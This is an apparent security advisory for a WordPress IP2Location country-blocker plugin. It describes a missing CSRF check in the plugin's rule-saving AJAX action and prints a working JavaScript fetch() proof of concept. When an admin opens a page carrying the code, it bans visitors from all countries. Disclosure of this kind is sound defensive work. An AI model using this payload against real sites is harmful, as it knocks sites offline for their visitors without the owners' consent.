The plugin does not have CSRF check in the ip2location_country_blocker_save_rules AJAX action, allowing attackers to make a logged in admin block arbitrary country, or block all of them at once, preventing users from accessing the frontend.
Make an admin open a page with the following code in it, which will ban visitors from all countries: fetch("https://example.com/wp-admin/admin-ajax.php", { "headers": { "content-type": "application/x-www-form-urlencoded", }, "body": new URLSearchParams({"action":"ip2location_country_blocker_save_rules", "countries[]": "nonexistent", "mode": 0}), "method": "POST", "credentials": "include" }) .then(response => response.text()) .then(function(data) { console.log(data); });
Krzysztof Zając
Krzysztof Zając
Yes
2022-01-06 (about 1 years ago)
2022-01-06 (about 1 years ago)
2022-04-08 (about 10 months ago)